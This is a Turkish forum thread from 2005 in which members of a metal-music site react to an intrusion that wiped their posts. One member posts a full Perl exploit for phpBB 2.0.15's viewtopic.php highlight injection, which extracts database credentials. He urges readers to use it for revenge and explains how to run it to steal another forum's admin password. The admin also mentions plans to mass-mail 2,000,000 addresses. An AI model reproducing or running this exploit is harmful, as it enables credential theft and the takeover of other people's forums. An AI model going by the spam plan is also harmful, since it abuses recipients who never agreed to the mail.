Nightmare :: Başlığı Görüntüle - Saldırı
   
  SSS Arama Üye Listesi Kullanıcı Grupları Profil Kayıt Ol Login  
     
 
Saldırı
Sayfa 1, 2, 3  Sonraki
 
Yeni Başlık Gönder   Cevap Gönder    Nightmare Forum Ana Sayfası -> Duyurular - NEWS
Önceki başlık :: Sonraki başlık  
Yazar Mesaj
Karga
-=[ ADMIN ]=-
-=[  ADMIN  ]=-


Kayıt: 21 Eyl 2005
Mesajlar: 136

MesajTarih: Pzr Ekm 02, 2005 5:53 pm    Mesaj konusu: Saldırı Alıntıyla Cevap Ver

Sitemizi çekemeyenler hala saldırı yapıyorlar.Bu seferde mesajları silmişler.Sanırım en iyi forumuz ve çekemiyorlar....
BAŞKA BİRŞEY DEMEK İSTEMİYORUM.
_________________
Başa dön
Kullanıcı profilini gör Özel mesaj gönder
nuitari
((¯¨¤» Dóóm M⚆èr «¤¨¯))
((¯¨¤» Dóóm M⚆èr «¤¨¯))


Kayıt: 22 Eyl 2005
Mesajlar: 196

MesajTarih: Pzr Ekm 02, 2005 6:08 pm    Mesaj konusu: Alıntıyla Cevap Ver

önlemimizi almışmıydık????
Başa dön
Kullanıcı profilini gör Özel mesaj gönder MSN Messenger
Sİebenburgen
-=[ Ñóób ]=-


Kayıt: 25 Eyl 2005
Mesajlar: 17

MesajTarih: Pzr Ekm 02, 2005 6:28 pm    Mesaj konusu: Alıntıyla Cevap Ver

olcak iş deil..yeni albumler eklicem ama onlarda silinmesin ..
Başa dön
Kullanıcı profilini gör Özel mesaj gönder
ArsoN
Son Of Northern Darkness
Son Of Northern Darkness


Kayıt: 23 Eyl 2005
Mesajlar: 451

MesajTarih: Pzr Ekm 02, 2005 6:32 pm    Mesaj konusu: Alıntıyla Cevap Ver

exploit işte nolacak başkalarının yazdığı kodlarla saldırıyorlar. olay şu anladığım kadarıyla adam adminlerden birinin kullanıcı adı ve şifresin ibulup yönetim panelinden temizlik yapıyor. merak edenler ve intikam almak istiyenler aşağıdaki kodu kullansın. yada www.tahribat.com DENYO LAUNCER programını indirip saldırsın.

#!/usr/bin/perl

# ************************************************** ************
#**
#** phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability
#** This exploit gives the user all the details about the database
#** connection such as database host, username, password and
#** database name.
#**
#** Written by SecureD, gvr.secured<AT>gmail<DOT>com,2005
#**
#** Greetings to GvR, Jumento, PP, CKrew & friends
#**
# ************************************************** ************

use IO::Socket;

print "+-----------------------------------------------------------------------+rn";
print "| PhpBB 2.0.15 Database Authentication Details Exploit |rn";
print "| By SecureD gvr.secured<AT>gmail<DOT>com |rn";
print "+-----------------------------------------------------------------------+rn";

if (@ARGV < 3)
{
print "Usage:rn";
print "phpbbSecureD.pl SERVER DIR THREADID COOKIESTRINGrnrn";
print "SERVER - Server where PhpBB is installed.rn";
print "DIR - PHPBB directory or / for no directory.rn";
print "THREADID - Id of an existing thread.rn";
print "COOKIESTRING - Optional, cookie string of the http request.rn";
print " Use this when a thread needs authentication for viewingrn";
print " You can use Firefox in combination with "Live HTTPrn";
print " Headers" to get this cookiestring.rnrn";
print "Example 1 (with cookiestring):rn";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 "
phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22
autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22
userid%22%3Bs%3A1%3A%222%22%3B%7D;
phpbb2mysql_sid=10dae92b780914332896df43808c4e09" rnrn";
print "Example 2 (without cookiestring):rn";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 20 rn";
exit();
}

$serv = $ARGV[0];
$dir = $ARGV[1];
$threadid = $ARGV[2];
$cookie = $ARGV[3];

$serv =~ s/http:////ge;
$delimit = "GvRSecureD";

$sploit = $dir . "viewtopic.php?t=";
$sploit .= $threadid;
$sploit .= "&highlight='.printf($delimit.";
$sploit .= "$dbhost.";
$sploit .= "$delimit.";
$sploit .= "$dbname.";
$sploit .= "$delimit.";
$sploit .= "$dbuser.";
$sploit .= "$delimit.";
$sploit .= "$dbpasswd.";
$sploit .= "$delimit).'";

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80")
or die "[+] Connecting ... Could not connect to host.nn";

print "[+] Connecting OKn";
sleep(1);

print "[+] Sending exploit ";
print $sock "GET $sploit HTTP/1.1rn";
print $sock "Host: $servrn";
if ( defined $cookie) {
print $sock "Cookie: $cookie rn";
}
print $sock "Connection: closernrn";


$succes = 0;

while ($answer = <$sock>) {
$delimitIndex = index $answer, $delimit;
if ($delimitIndex >= 0) {
$succes = 1;
$urlIndex = index $answer, "href";
if ($urlIndex < 0){
$answer = substr($answer, length($delimit));
$length = 0;
while (length($answer) > 0) {
$nex = index($answer, $delimit);
if ($nex > 0) {
push(@array, substr($answer, 0, $nex));
$answer = substr($answer, $nex + length($delimit), length($answer));
} else {
$answer= "";
}
}
}
}
}

close($sock);

if ($succes == 1) {
print "OKn";
sleep(1);
print "[+] Database Host: " . $array[0] . "n";
sleep(1);
print "[+] Database Name: " . $array[1] . "n";
sleep(1);
print "[+] Username: " . $array[2] . "n";
sleep(1);
print "[+] Password: " . $array[3] . "n";
sleep(1);
} else {
print "FAILEDn";
}
_________________


MP3 FILES
"Ride For Vengeance" (3677 KB) from "Once Sent From The Golden Hall"
""Metalwrath" (3138 KB) from "The Avenger"
"Masters Of War" (3839 KB) from "The Chrusher"
"Death In Fire" (4741 KB) from "Versus The World"
" "An ancient sign of coming storm" from "Fate of norns"
Başa dön
Kullanıcı profilini gör Özel mesaj gönder E-mail'i gönder MSN Messenger
Eriny_Alekto
-=[ Mèmbèr ]=-


Kayıt: 26 Eyl 2005
Mesajlar: 44

MesajTarih: Pzr Ekm 02, 2005 6:57 pm    Mesaj konusu: Alıntıyla Cevap Ver

arkadaşlar tekrar geçmiş olsun ama insan emeğine saygısı olmayan bu "insanlara (!)" karşı bi önlem alamıyomuyuz acaba. yani bi hafta sonra tekrar bunun olabilme ihtimali varsa çok kötü.
_________________
Sİ VİS PACEM PARA BELLUM
Başa dön
Kullanıcı profilini gör Özel mesaj gönder E-mail'i gönder
nuitari
((¯¨¤» Dóóm M⚆èr «¤¨¯))
((¯¨¤» Dóóm M⚆èr «¤¨¯))


Kayıt: 22 Eyl 2005
Mesajlar: 196

MesajTarih: Pzr Ekm 02, 2005 7:27 pm    Mesaj konusu: Alıntıyla Cevap Ver

ya bişeyi merak ettim sitenin kopyasını kendimiz alamazmıyız pcmize...yani illaki sağlayıcımızın alması mı lazım???
Başa dön
Kullanıcı profilini gör Özel mesaj gönder MSN Messenger
darthmaul88
-=[ Ñóób ]=-


Kayıt: 26 Eyl 2005
Mesajlar: 31
Nerden: karanlık diyardan

MesajTarih: Pzr Ekm 02, 2005 7:36 pm    Mesaj konusu: Alıntıyla Cevap Ver

hocam kim saldırıyo anlamadım ayrıca arson verdiğin koddları ne yapacağız
_________________
KARANLIK GÜÇ SİZİNLE OLSUN
Başa dön
Kullanıcı profilini gör Özel mesaj gönder
nuitari
((¯¨¤» Dóóm M⚆èr «¤¨¯))
((¯¨¤» Dóóm M⚆èr «¤¨¯))


Kayıt: 22 Eyl 2005
Mesajlar: 196

MesajTarih: Pzr Ekm 02, 2005 7:42 pm    Mesaj konusu: Alıntıyla Cevap Ver

bu şekilde bi önlem alınmadan siteyi doldurmaya devam etmek sinirlerimizi bozmaktan başka bi işe yaramaz...ayrıca madem adminlerden birinin hesabına girdiler IPleri orda yazar sanırım...bu adamları bulamazmıyız..böle karşı saldırıyla olmaz medeniyetin sınırı buraya kadar bu adamları dövmek lazım artık.
Başa dön
Kullanıcı profilini gör Özel mesaj gönder MSN Messenger
ArsoN
Son Of Northern Darkness
Son Of Northern Darkness


Kayıt: 23 Eyl 2005
Mesajlar: 451

MesajTarih: Pzr Ekm 02, 2005 8:19 pm    Mesaj konusu: Alıntıyla Cevap Ver

darthmaul88 demiş ki:
hocam kim saldırıyo anlamadım ayrıca arson verdiğin koddları ne yapacağız


perl ve msdos bilenler için verdim kısaca not defterine kopyalayıp perl içine atıp mes dos ile çalıştırıp adminin şifresini çalmak istediğin phpbb forumundan bir sayda linkini yazarsan ve o forumda bu açık kapatılmamışsa adminin şifresi eline geçer. bu seferki silme işini nasıl yaptılar diye anlaşılması için verdim. bu açıklar kapatılmadığı sürece forum da ki her yazdığımızı silmeye devam edeceklerdir.
_________________


MP3 FILES
"Ride For Vengeance" (3677 KB) from "Once Sent From The Golden Hall"
""Metalwrath" (3138 KB) from "The Avenger"
"Masters Of War" (3839 KB) from "The Chrusher"
"Death In Fire" (4741 KB) from "Versus The World"
" "An ancient sign of coming storm" from "Fate of norns"
Başa dön
Kullanıcı profilini gör Özel mesaj gönder E-mail'i gönder MSN Messenger
ArsoN
Son Of Northern Darkness
Son Of Northern Darkness


Kayıt: 23 Eyl 2005
Mesajlar: 451

MesajTarih: Pzr Ekm 02, 2005 8:25 pm    Mesaj konusu: Alıntıyla Cevap Ver

nuitari demiş ki:
bu şekilde bi önlem alınmadan siteyi doldurmaya devam etmek sinirlerimizi bozmaktan başka bi işe yaramaz...ayrıca madem adminlerden birinin hesabına girdiler IPleri orda yazar sanırım...bu adamları bulamazmıyız..böle karşı saldırıyla olmaz medeniyetin sınırı buraya kadar bu adamları dövmek lazım artık.


ipleri online olduğu zaman yazar. 2.si dediğim gibi adminlerden birinin kullanıcı adı ve şifresini çalmışlardır (muhtemelen çünkü içerden silinmiş herşey ) o isimle giriş yapmışlardır bu bende olabilirim karga da darkdreamed da. nasıl bulunur kimin yaptığı aklıma bazı şeyler geliyor ama zor. mesela her admin kendine yeni üyelik açar ve sürekli online olarak siteyi takip eder ama admin olarak giriş yapmaz eğer adminin biri online olarak görünüyorsa bu silme işlemi yapan elemandır ozaman ip si alıp banlanır. bence başka çözümüa yok. açık kapatılmazsa istediğin kadar banla devam edecektir.
_________________


MP3 FILES
"Ride For Vengeance" (3677 KB) from "Once Sent From The Golden Hall"
""Metalwrath" (3138 KB) from "The Avenger"
"Masters Of War" (3839 KB) from "The Chrusher"
"Death In Fire" (4741 KB) from "Versus The World"
" "An ancient sign of coming storm" from "Fate of norns"
Başa dön
Kullanıcı profilini gör Özel mesaj gönder E-mail'i gönder MSN Messenger
Zarathustra
-=[ Ñóób ]=-


Kayıt: 26 Eyl 2005
Mesajlar: 23
Nerden: İzmir

MesajTarih: Pzr Ekm 02, 2005 8:39 pm    Mesaj konusu: Alıntıyla Cevap Ver

Bunu yapan adamlar için söylenecek pek çok söz var... ama forum ahlakı açısından söylenmez şimdi burda..
_________________
Bütün hayata sırt çevirmişim rüyamda.
Gece ve mezar bekçisi olmuşum
yukarda,ölümün o ıssız şahikasında.
Tabutlarını bekliyormuşum yükseklerde:
küf kokulu kubbeler zafer simgeleriyle doluydu.
Alt edilmiş hayat camdan tabutlardan bana bakıyordu
Başa dön
Kullanıcı profilini gör Özel mesaj gönder MSN Messenger
legba1862
-=[ Legba ]=-
-=[ Legba ]=-


Kayıt: 21 Eyl 2005
Mesajlar: 501

MesajTarih: Pzr Ekm 02, 2005 9:21 pm    Mesaj konusu: Alıntıyla Cevap Ver

BUNU YAPANI BİR YAKALASAM....

SANIRIM BU İŞ FREE SERVERLARLA OLMAYACAK ....

OTURUP ADAM GİBİ KARAR VERMEK LAZIM...
Başa dön
Kullanıcı profilini gör Özel mesaj gönder E-mail'i gönder
Karga
-=[ ADMIN ]=-
-=[  ADMIN  ]=-


Kayıt: 21 Eyl 2005
Mesajlar: 136

MesajTarih: Pzr Ekm 02, 2005 9:49 pm    Mesaj konusu: Alıntıyla Cevap Ver

Ewt legba ya para bulup siteyi alıcaz.yada olmayatacak böyle.

Olaya neredeyse canlı tanığım.onlinedım.kapadım siteyi.5 dakka içinde darkdreamed msnde site niye açılmıyor dedi.Baktım hemen siteye girince site kapalıdır uyarısı veriyor.Yönetim panelinden açtm hemen.Siteyi kapat seçilmiş.Açtım baktım mesajlar yok.Açıkçası bir şekil bulamazsak ben zaten forum olayını bırakıyorum.günlerdir hepimizin verdiği emekler 2 dakika içinde göz göre gidince sinir bir hayli taşıyor.Bence artık rapçi saldırı falanda değil bu.Rakipler bile olabilir.Çünkü ötekiler açık hiç kapanmadı.Sadece saldırı yapıldı onlara ama dikakt ederseniz hala aynı şekilde devam edyorlar.Bence bizim başarımızı çekemiyorlar.İnsanın aklına herşey geliyor.Napalım bulucaz inşallah bir çaresini...
_________________
Başa dön
Kullanıcı profilini gör Özel mesaj gönder
nuitari
((¯¨¤» Dóóm M⚆èr «¤¨¯))
((¯¨¤» Dóóm M⚆èr «¤¨¯))


Kayıt: 22 Eyl 2005
Mesajlar: 196

MesajTarih: Pzr Ekm 02, 2005 10:14 pm    Mesaj konusu: Alıntıyla Cevap Ver

evet iki kıçıkırık rapçinin bunları yapabilmesi bana da mucizevi geliyor...özellikle metaltr admininin verdiği cevaptan sonra benimde aklıma bazı ihtimaller gelmeye başladı!!!!neyi paylaşamıyoruz anlamış değilim.
Başa dön
Kullanıcı profilini gör Özel mesaj gönder MSN Messenger
Karga
-=[ ADMIN ]=-
-=[  ADMIN  ]=-


Kayıt: 21 Eyl 2005
Mesajlar: 136

MesajTarih: Pzr Ekm 02, 2005 11:01 pm    Mesaj konusu: Alıntıyla Cevap Ver

Başarıyı dostum başarıyı bence.Başka metal forum sitelerinde adminlerin yaptığı açıklamalar benide kötü düşüncelere itti baya.Eğer saldırı olmasaydı en yakın zamanda en iyi siteler den biri olacaktık.Bu şekil başka bir site gösterseize bana.Online metal radyosu olan.Bu şekil metal müziğe benzeyen.Bütün arama motorlarına ekleme yapmıştım msiteyi , aysıca paylaşım linklerine de...Elimde 2.000.000 mail ve bunları göndericek programım mevcuttu .daha bugün buldum.Sitein reklamı açısından 2.000.000 kişiye aynı anda sitemizi tanıtacaktım.Sadece bu kadar değil daha bir çok şey yapacaktım gerek reklam olsun , gerek dizayn olsun.Ama artık ne zevkim nede şevkim kaldı bunları yapmak için...
Ve dediğim gibi rapçi olduğunu hiç sanmıyorum bu iblislerin.
Aslında rahatlama başlığı açim bir tane..Oraya girip bu deyyuslara istediğiniz küfürü aklınızdan geçenleri yazın.Smile

Ayrıca nightmareforum@yahoo.com adresine herkes mail göndersin.bütün üyeler yarın öbürgün site hiç açılmazsa gene ve biz daha güvenli yeni bir site yapmak zorunda kalırsak oradan hepinize ulaşalım...
Bkarsınız yarın lastviking gibi offline olur burasıda..
_________________
Başa dön
Kullanıcı profilini gör Özel mesaj gönder
Mesajları göster:   
Yeni Başlık Gönder   Cevap Gönder    Nightmare Forum Ana Sayfası -> Duyurular - NEWS Tüm saatler GMT
Sayfa 1, 2, 3  Sonraki
1. sayfa (Toplam 3 sayfa)

 
Forum Seçin:  
Bu forumda yeni konular açamazsınız
Bu forumdaki mesajlara cevap veremezsiniz
Bu forumdaki mesajlarınızı değiştiremezsiniz
Bu forumdaki mesajlarınızı silemezsiniz
Bu forumdaki anketlerde oy kullanamazsınız
 
     
Original World of Warcraft™ Horde forum design by boo, 2004 - ez-life.net
World of Warcraft™ is a trademark and Blizzard Entertainment is a trademark or
registered trademark of Blizzard Entertainment in the U.S. and/or other countries.


Powered by phpBB © 2001, 2002 phpBB Group
Türkçe Çeviri : Onur Turgay & Erdem Çorapçıoğlu